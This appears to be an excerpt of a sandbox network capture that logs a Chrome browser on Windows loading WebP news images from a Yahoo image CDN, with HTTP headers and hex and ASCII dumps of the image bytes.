                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-request-id: fe8bade29cbd58dddcd7bbd3045340b0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 16304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 52 49 46 46 a8 2a 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 20 00 00 00 17 02 00 1b 01 00 49 43 43 50 0c 02 00 00 00 00 02 0c 6c 63 6d 73 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 dc 00 01 00 19 00 03 00 29 00 39 61 63 73 70 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 6c 63 6d 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 64 65 73 63 00 00 00 fc 00 00 00 5e 63 70 72 74 00 00 01 5c 00 00 00 0b 77 74 70 74 00 00 01 68 00 00 00 14 62 6b 70 74 00 00 01 7c 00 00 00 14 72 58 59 5a 00 00 01 90 00 00 00 14 67 58 59 5a 00 00 01 a4 00 00 00 14 62 58 59 5a 00 00 01 b8 00 00 00 14 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFF*WEBPVP8X ICCPlcmsmntrRGB XYZ )9acspAPPL-lcmsdesc^cprt\wtpthbkpt|rXYZgXYZbXYZr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 85 d8 28 01 23 bd 51 fc b4 35 58 ec 02 b1 cc e7 2d ed ff c1 2b ac d4 9d c0 34 2b 2e 08 f5 35 83 9f fc fe 35 3a 95 05 3e 06 b6 4b e9 4b 9c fb 78 df 21 44 58 e5 6b 95 eb 27 aa ae 33 15 66 1d 1e 75 92 45 bd ce ba b2 0a 16 e9 d7 4f ec ac ef cf 7c 34 be d1 30 61 4c 42 db 1f bb 7a 87 a4 58 21 49 d5 81 c1 29 fb fe 35 a5 95 24 22 e2 ee 8c 52 65 18 71 4b 85 6b 39 40 8c ad 94 12 eb ff b3 a0 a0 cb cf 0a a5 ff 4e b4 e2 6c 48 69 34 2d ca 93 fe 4c 74 e0 e9 a4 d1 a0 ec 23 b1 42 25 19 b3 36 a7 8d db 35 9e 9f 74 54 53 2c 49 92 c9 f4 90 bc 4e ce c7 b9 5b 66 4f 3a be 0d 5c 3f be f9 9a bd aa 34 3e 00 f2 7f 0f 86 b5 df dc 33 16 60 f7 0b bb 14 75 32 0b 28 b2 44 a6 68 a7 b9 f1 90 0e 4a 74 fc 82 5a 16 0b 00 53 f1 36 31 6e 8e ca 76 f6 67 e1 7d 13 43 1a 32 de 18 b0 cc 04 53 4e c1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (#Q5X-+4+.55:>KKx!DXk'3fuEO|40aLBzX!I)5$"ReqKk9@NlHi4-Lt#B%65tTS,IN[fO:\?4>3`u2(DhJtZS61nvg}C2SN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 4b 5e ab 4d f4 87 8b a0 ea 0d a9 26 0b 00 da d1 dd 45 51 01 f0 0f 05 36 f5 3d 30 28 07 00 a0 91 76 87 48 88 05 ad fc b2 6f 56 cc 28 fa fc 96 cc 81 58 7f c9 88 71 8e 76 f1 e5 c8 c0 91 42 82 ce f2 5f f1 05 d3 38 8a d8 fe 63 ef 01 e7 2a 98 99 59 a0 89 95 e0 7d 8d da 42 f7 40 88 4b 76 42 c1 81 b3 c4 bd 2e 03 bd f9 25 57 7a 38 8a d7 35 5d 0f f4 93 0f 08 93 36 7c ca cb 8b 2d 84 d9 83 ed e5 0c e2 34 27 55 54 2c e4 d2 1b 31 19 37 1e e7 6b 29 9c 1a 5b 74 75 0d 7f e7 25 36 78 d1 6d 61 b4 34 49 83 f4 e6 93 00 a4 87 05 6a a8 70 7f 7a 37 01 b4 98 ef d7 ae 10 f2 40 7e 53 0d 99 6a bd 2d d4 3a e7 88 bb 35 22 49 6b ae 01 2d 45 e9 16 c1 27 49 d9 4d 78 75 a8 d2 1e 07 0b f8 07 8f 51 20 9b 74 43 e9 c4 bd 42 b1 76 2f ab 45 ef 00 c1 b6 32 ba dd 4b f6 ed d5 9c 8d 4b 9b 39 f9 d7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: K^M&EQ6=0(vHoV(XqvB_8c*Y}B@KvB.%Wz85]6|-4'UT,17k)[tu%6xma4Ijpz7@~Sj-:5"Ik-E'IMxuQ tCBv/E2KK9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 5c 52 f5 35 42 f5 0f 06 09 8f ae a4 da e4 23 c0 4e c4 e3 2a e2 85 35 a5 22 81 82 ee ed 21 31 37 d9 21 12 3f f6 2b fb 9a 3c fc d8 a5 09 81 61 b5 13 7d cd 69 cf 29 28 3d 3d 2a 97 f7 71 97 c8 ef 46 0d 11 cf 51 0a 97 0d 09 e4 05 89 a7 11 28 d4 2c c5 72 15 9b 20 92 a3 09 5c ff 5a 8a 57 42 a7 51 41 7e 66 d4 6a d3 83 ec 7d d1 50 54 7c b9 39 be a2 e4 d6 1d 7a 24 ab 2b 6d e1 fa 08 27 47 0b f8 36 5a 83 3b 5c 8e 94 4e 50 13 6e f2 b7 23 ae 69 77 1e 78 33 52 bc 22 e1 d9 93 f3 f3 ca 8e 40 de 2f 8a dd 04 22 59 30 10 3b cf ca 5f c7 69 6b a3 dd 3a ed 81 85 cd c1 c4 35 54 36 58 11 3c 88 2e 79 4a d9 65 2a c2 82 4d 38 1c b6 57 ac 5d f6 e1 8c 2f 3b 86 af 5d 5b da 40 06 64 5b eb fb 8b 51 e8 ba 6a c3 d1 11 27 e3 55 bf 50 33 14 bc 10 3b d6 73 04 e6 83 7d 68 d7 50 b9 25 9c 5f 85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: \R5B#N*5"!17!?+<a}i)(==*qFQ(,r \ZWBQA~fj}PT|9z$+m'G6Z;\NPn#iwx3R"@/"Y0;_ik:5T6X<.yJe*M8W]/;][@d[Qj'UP3;s}hP%_
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: eb a7 2f 3c f0 4a b9 c4 b2 a5 48 40 cd 5c a9 12 48 e4 8d fb 73 24 b5 57 17 8d 8d 1a 10 19 88 b9 b2 af 69 36 1a e5 a3 77 b0 8c 68 6c 6e a9 96 54 1d b1 b8 d0 cd b1 df 3d 33 13 3c 78 45 18 3b 74 75 9b e6 34 74 ce b7 86 96 4a 51 6c c5 31 35 22 0f a7 4a 56 1d 29 1b 93 9b 05 8b ab 49 b3 fe e6 2f 95 a1 e6 90 49 ce c9 1a 44 a7 91 9a d8 26 81 52 3f 06 76 df 81 c9 84 15 95 ba 79 df 89 65 9b 51 74 e8 2d 26 f9 51 e4 53 7a c6 1f db 0b c8 b3 83 6d ea a0 19 a6 17 c5 a0 f1 55 75 08 47 99 b0 80 77 a2 f5 36 2e c1 d7 e0 26 71 80 de ad 0d 2e 0b bd 40 8a aa b7 37 b7 83 e4 e3 71 ba 84 bb 76 38 d5 1e cd 1c 5b 2c 4f ca 01 3d 76 c1 d6 c8 48 a4 d2 ea ca 43 c1 f7 04 eb b4 ec e6 17 f2 9b b9 eb a6 ba c8 7a a0 f5 62 b4 8c b8 2f 00 8b 05 78 ec 12 29 6f 6f 60 f3 72 62 10 ab d5 d6 3a b8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: /<JH@\Hs$Wi6whlnT=3<xE;tu4tJQl15"JV)I/ID&R?vyeQt-&QSzmUuGw6.&q.@7qv8[,O=vHCzb/x)oo`rb:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: e3 90 cc 31 d6 81 a7 a2 38 70 2c e2 2b 7e 72 70 ab 38 c8 0d 98 12 9f 4b a5 5b f5 79 68 86 14 98 25 7a 11 72 52 c8 c4 c7 03 95 76 2d c1 7a bb dd 45 99 45 91 3e 63 ab 5a 68 3a ae 6f c5 30 16 bc 18 79 cd 92 a4 91 0c 66 3d 52 46 c1 be 3c 8a d9 d8 4a 53 0a 14 64 4e f7 4c 5b ea 3d 2f 67 f7 06 cc 76 c8 73 f7 f2 3c e3 cf 4f 80 a6 d8 f4 05 b8 91 b7 94 0b 2e c0 85 3a af 4a 79 4f c6 63 d6 af 1d 0a 1b 09 ba 53 16 83 0f c4 4f aa 25 6f db d8 c6 d8 56 7c 67 47 33 c8 c2 c3 36 8e c9 0c e8 47 32 f4 3a ee 9a 00 7c 31 32 93 7b 7c 35 86 ad ae 75 b2 2b 93 41 1b 12 7b 00 aa af 4d ca a4 89 88 0d c6 9e 7e 3e 11 a7 47 1e 38 89 e7 13 38 13 4d 56 4f 5b 81 c3 31 4e 55 57 79 e7 d2 60 c6 b7 81 7f 77 0b 83 90 18 d3 01 e6 6c 2d 15 f0 d0 0f f1 a0 c6 af 5e c7 db e5 f8 df c8 04 7a b9 5c 1e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 18p,+~rp8K[yh%zrRv-zEE>cZh:o0yf=RF<JSdNL[=/gvs<O.:JyOcSO%oV|gG36G2:|12{|5u+A{M~>G88MVO[1NUWy`wl-^z\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 7d 6a 42 eb 7f 18 72 d1 49 d9 46 82 45 10 61 39 90 0e 69 3f 0f e6 2b 63 3f b4 2c 2b c0 15 42 2b a3 cc 58 4e ea 97 2a 63 6e d3 3f 78 12 5d e3 90 20 cd 58 5a d8 e0 d2 40 a3 5c e4 00 df 3e 75 4b f8 b8 39 bb 72 be de 43 4f d6 09 d1 2c f1 5b 2f 8d fb a4 3e 87 32 66 01 8b 19 7c a3 03 a2 1f 67 6a 1e 28 e4 87 da d0 22 76 46 69 0b f5 cd 68 ba 99 b5 f0 45 d1 5d 4e f3 b3 bd f2 d6 30 fd e5 12 bf c5 de 8b b8 df e5 b9 b7 eb ae 3a ee 0b 51 71 5d 3b 4f 24 00 99 87 58 3d 29 2f 9f 7c b4 d5 92 ac dc d4 34 0f 80 2b ef b2 23 3e d6 d9 ab 5e 4e 7a d7 0e 56 2a 37 5a ca 96 00 58 4c a0 5d a8 10 3a c5 96 4d 96 c4 b3 ed f4 cc 76 ad 96 07 7f 08 19 4d 9b 6d c8 72 e2 09 ae ba 19 57 5a ee bb f9 12 25 ff 20 ec 90 58 db 89 e0 1c 1a d2 49 af 26 4f b4 ed 3f 7d 92 15 f6 ce 8f 0a 78 6e 01 2a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: }jBrIFEa9i?+c?,+B+XN*cn?x] XZ@\>uK9rCO,[/>2f|gj("vFihE]N0:Qq];O$X=)/|4+#>^NzV*7ZXL]:MvMmrWZ% XI&O?}xn*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 36 5c 27 55 1a ff ec 21 69 db d9 74 7a a6 75 b4 8c 63 d1 62 a5 c7 be 40 43 28 c1 28 34 31 91 1e e8 23 f0 a5 a2 6b 37 5a 26 c9 c6 83 5f f7 b9 61 00 ea 58 41 9c ac ff 62 53 f1 3a d9 99 8b 5b f7 30 ef a7 45 66 8d 74 91 17 3c 26 50 90 00 b7 68 ed 6d 6e 7c cc 5a 05 f7 85 70 ec 56 2b 97 5f 50 a6 ec 6a d7 7f 74 74 44 46 16 22 f4 ca d2 65 23 5b 26 6a 66 8c 34 a3 e6 38 0d 94 23 cc b3 9a 6b 01 90 0b 6e cd 4c c7 67 d0 3a 03 a3 5c 6b 69 ec 1e 88 c1 d7 54 4b b6 f0 c0 3e d1 de 72 b8 f1 3a 6c 61 b7 fc 49 ef b3 69 5a 37 fb df ab f8 d8 0a 86 ca 1e e2 79 14 de 79 03 c1 59 08 e0 0f cd 87 0e 00 d1 da ee 6c 05 9a 18 0c 5b a9 3d 08 b9 49 24 e9 36 12 d6 0d 21 cc 7a 89 77 df 0f 98 2e df e7 5b ce 41 40 f1 27 43 4b 28 ad 97 08 1f 19 3b 12 cd 61 1c 27 28 d7 f3 62 55 c4 77 93 cd 3e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 6\'U!itzucb@C((41#k7Z&_aXAbS:[0Eft<&Phmn|ZpV+_PjttDF"e#[&jf48#knLg:\kiTK>r:laIiZ7yyYl[=I$6!zw.[A@'CK(;a'(bUw>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC528INData Raw: 0d a7 6a da 9e f0 ef a0 3d 77 71 12 5c fd 0b 14 13 01 2c 6c 45 e0 57 d4 24 d3 73 46 f0 35 94 77 47 fa 40 31 37 f5 f3 41 0d 42 f5 74 78 04 79 52 9c 6f 7f 2c 75 f8 59 ff 0e 5e 5e 31 dc aa 52 a4 c1 93 b1 43 9a 42 a8 1a 4d 92 3d 8f eb 85 8b 68 1a 11 f5 dc 27 32 65 87 2a f7 1d 21 9e fb d2 ae 64 a6 63 bf 84 89 5e 2f 92 e3 29 73 c8 77 0e 5a 3d 75 1c 5d 3f 08 8d 82 91 77 46 c1 a9 45 8b e6 77 01 9c d2 da 64 e5 fb a5 d9 ef 9b 18 fc aa 0d 51 62 24 92 3d a6 88 e8 1c 10 bc 1b f3 49 bd 24 f7 7f 1c 60 1b f8 de d2 88 5b 7b a4 7c 8b 18 f3 9c 0c ac af 68 f0 c4 1c 61 6a ef eb 91 44 ec 49 e3 e2 1f 7a 9b 7f 2a d0 65 14 65 27 bc 2b e0 bb 60 fa 98 78 90 9a 1e f8 41 aa 4f 01 99 ec df 5d fa 01 f0 d8 73 e6 3b fa e5 26 c0 bc e7 5e b0 5a c6 2d c7 4d a4 df 51 2f 8e 5d cb 4e b1 05 0c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: j=wq\,lEW$sF5wG@17ABtxyRo,uY^^1RCBM=h'2e*!dc^/)swZ=u]?wFEwdQb$=I$`[{|hajDIz*ee'+`xAO]s;&^Z-MQ/]N


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              139192.168.2.45116487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC760OUTGET /uu/api/res/1.2/JjtDc3_w.qhGQrf4A_jcxA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/miami_herald_mcclatchy_975/e866e6133d9de1f7a90c43f44013066c.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1084INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 23746
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="e866e6133d9de1f7a90c43f44013066c.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "8162ed09fa11904dcd84ec39c21a5963"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 06 May 2024 08:41:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Request-Id: 4903ce2f74c415a97b15e4d5eacce688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 10:53:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-10-08T10:53:48.125Z;desc=hit,rtt;dur=88,content-info;desc="width=536,height=284,bytes=23746,owidth=1140,oheight=855,obytes=139268,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 29997
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: 4903ce2f74c415a97b15e4d5eacce688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 52 49 46 46 ba 5c 00 00 57 45 42 50 56 50 38 20 ae 5c 00 00 70 59 01 9d 01 2a 18 02 1c 01 3e 79 38 96 48 24 a3 22 27 a7 d5 cc 08 f0 0f 09 67 6d 53 ee f3 4b c8 3c 2b c4 36 27 10 74 b2 d4 4b 50 ac f3 8e 70 d7 29 77 99 72 61 88 fe 13 f3 94 27 cd fa df fd 07 ee 9e 51 d7 73 f8 5f 02 bf ac f6 e5 ff 47 bf 5f d9 3c 42 3d c9 e7 d1 03 37 0a 61 17 84 5f c9 fa 81 79 8d df cd 40 6f d4 3e b1 9f f6 f9 51 fd f3 fe e7 b0 7f 4b ef de df ff fe f0 1f b6 67 94 24 69 df c4 63 3b 2e d0 c5 5f d5 54 93 7a 9e 47 2a 6f 02 18 2f db b3 1b fe c4 48 09 84 84 b6 7f 5f d5 1e a3 e7 9c 61 43 4d 5d b3 a2 db 17 e5 0d 72 a0 3e 40 f6 a4 bc ce c3 21 af fd 69 62 24 f6 f2 04 c9 3f 8c d2 ec bc 13 89 84 4b d4 c7 2c bd c7 9e a2 78 5d ed e3 a4 cc d5 c4 d1 55 db 40 1c dc 38 4a db 18 db ef 7b 4a 5d 8f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: RIFF\WEBPVP8 \pY*>y8H$"'gmSK<+6'tKPp)wra'Qs_G_<B=7a_y@o>QKg$ic;._TzG*o/H_aCM]r>@!ib$?K,x]U@8J{J]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: c4 bf 29 4f ef 2c 69 90 27 b4 6e 2c 1b 48 27 9e 21 34 35 f4 50 52 da 52 43 93 81 09 ce 3d e8 72 70 e9 de c5 68 54 be e5 ff 51 e9 2f b2 0e 71 f6 eb 95 a3 1e 35 75 16 c1 58 6f b6 1d 92 c9 f8 3e 53 34 21 cb 7a 1e 52 91 d4 95 70 84 e3 46 fb aa 4b bc e5 90 bd e4 8a 77 86 3c f1 e6 2e 95 c3 3c 6d d1 30 8a 9f dd 27 87 cd 97 31 a6 b5 7d 1f e9 86 53 d1 29 df bd a9 9e 7c e3 35 74 5f 0b d1 29 6c c6 bf 5b 0d 9d ef a0 3a 02 68 3f 01 bf 4d 21 cd 67 7a bb 39 5b 48 78 b0 cd b2 11 dd 57 da 17 7a d3 a2 2e d9 e9 67 2f fb 90 31 24 be df 60 51 b0 c5 ac 9f 5e e4 18 eb a7 81 43 0a e2 59 56 75 c4 d2 57 28 7d db 81 db 44 6a 3a d2 a2 a1 4c b6 96 a9 1c 7f 9e e8 4d 91 fd ff 93 78 83 8d 44 b1 48 42 a9 78 ec b9 b4 6c 5c fb f0 8e 7e 5a 62 3d cf db e6 f5 e8 67 89 e5 c0 22 00 68 6a 58 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: )O,i'n,H'!45PRRC=rphTQ/q5uXo>S4!zRpFKw<.<m0'1}S)|5t_)l[:h?M!gz9[HxWz.g/1$`Q^CYVuW(}Dj:LMxDHBxl\~Zb=g"hjX(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 81 e0 a4 8f af 0d f5 ba b3 f6 ae 21 b3 4a 1c 6a 69 f6 c5 dc 16 a6 5f 4a 23 fa 80 6f 5d d3 9b 04 56 63 1a 5a 20 00 83 7b a7 2e eb d7 76 da 98 7c 39 09 36 7a d5 52 e4 31 cc 94 90 ac 5b 77 b9 8e 40 2f 1b e5 d9 59 31 43 86 e2 52 f6 92 e3 ff ba 30 a2 47 1d 86 d5 e2 bc 0e 83 bd 75 28 e0 c8 72 8d e7 ea ee c9 46 a6 d9 5c c8 fa 0d 65 20 76 c1 6d 95 0c 87 93 73 0e f0 19 d2 45 f1 c4 2a a5 51 4e e2 ac 16 a9 08 8b dc f5 a1 0d fb 7a e1 49 34 7b 01 8f 20 8d 0f cf 51 72 91 32 f6 91 d9 9a 0b f2 c7 37 ed 97 cb 75 66 8d 89 1d d5 58 27 47 c7 12 0b ad ed 69 df 9c aa 80 7b 0c 76 71 ab 8a 00 00 fe f6 0c 1e b2 66 f6 c7 73 1e 3f fa 76 ec 50 08 39 73 8d 08 c1 e4 84 b3 07 a2 00 c9 0c 9a fe aa cc a2 8a 2d 26 92 45 6d f3 6c 8a 23 e4 39 52 4f 43 35 bb 60 5a 97 08 1e 0b d8 fe 0a b3 df
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !Jji_J#o]VcZ {.v|96zR1[w@/Y1CR0Gu(rF\e vmsE*QNzI4{ Qr27ufX'Gi{vqfs?vP9s-&Eml#9ROC5`Z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: fb 81 48 ac c7 aa 6f e0 31 2d 5c 5e 48 8e dc bd 1c 21 59 bf ad ca f4 57 0a c4 e4 5f 14 9d bb 9b 35 71 ce f4 8c 51 3f 53 47 97 5c 55 01 3f 0a cb 5c 32 a1 90 61 b9 ae e2 6a d7 36 32 ae 0f 9b f8 c7 ff e8 d5 cd ca 2a fd 1f 60 a4 1d 3e 8a 36 e0 04 d4 78 a8 6f 2d fe ee 64 ef 83 7b 96 8f d2 70 0e 2c 45 ab a9 d1 b2 04 68 63 fd fa cc 16 98 e2 2e fd e5 84 fb f2 07 8c 64 f7 32 5d 3f f8 66 b8 3d af f1 17 2a 33 d1 e6 15 7c 2f c5 70 fc e9 c2 b8 d8 6f 92 86 13 4c 4c 8f 37 91 e1 7f 02 c3 31 df 31 8b b0 fb ca b7 81 f9 7d 89 21 4f 4a ba a2 77 97 d6 58 0f 3c 7f 32 7d 19 f7 31 e3 c4 e7 f9 51 3b ef 02 17 4a 2f 4e be 81 d2 96 70 a0 42 9a 8c 7c aa 52 3c 9d bf 50 db 0f be 6a 42 ee 58 20 c1 f7 58 52 0b 02 42 9d 34 57 83 e1 ca d8 b2 7e 7e 64 2a 23 f9 b2 0e 55 38 59 de 64 ef 7a a0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Ho1-\^H!YW_5qQ?SG\U?\2aj62*`>6xo-d{p,Ehc.d2]?f=*3|/poLL711}!OJwX<2}1Q;J/NpB|R<PjBX XRB4W~~d*#U8Ydz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:45 UTC1300INData Raw: 6a c9 f1 6a 9c 6f 4e ef 2c 54 8a 92 09 78 e2 54 29 b1 d3 89 8a 02 4d 62 8c 30 70 e4 06 4b c5 e9 34 8c fd 36 b2 b3 ea ee 64 7c e3 86 4c 97 10 d6 99 ea 56 e5 66 87 f9 fc 72 d4 73 41 d3 16 55 28 68 0f c2 a3 7e ca 6a cb d4 83 98 74 c2 b9 b5 f5 45 e9 f1 aa 8f b5 de 45 1e af 44 4f 68 0c c4 8e bb 9b 54 a9 b3 bf c0 97 43 59 23 b1 a9 3a 8b 57 9a 9d 85 4a 7d 54 b4 a3 c3 5b 9b 26 c2 11 f0 58 93 73 2f 53 56 c9 2a 61 2a ef 1f 17 4e 51 9e 22 f0 d9 ee 60 9e 6a 13 93 ee 80 29 34 82 d6 18 be 6e 2d c3 b1 c7 36 6c f1 46 6b f4 c5 ad 33 53 40 f3 a1 89 0d 3b ef d5 88 3a 6d 06 8d 4e 8c 3f fb 22 51 91 69 ea 94 cc 9d 7b cd 31 db 1b d2 90 16 ab 3b 0f d6 64 59 a6 1e e4 8f cb 85 e0 0d bd b5 ae 46 8a fe ce ee d7 58 ce 6d cd 2c 23 e5 db b2 44 e8 6a a2 74 93 b8 90 82 a9 aa 1b 23 77 38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: jjoN,TxT)Mb0pK46d|LVfrsAU(h~jtEEDOhTCY#:WJ}T[&Xs/SV*a*NQ"`j)4n-6lFk3S@;:mN?"Qi{1;dYFXm,#Djt#w8
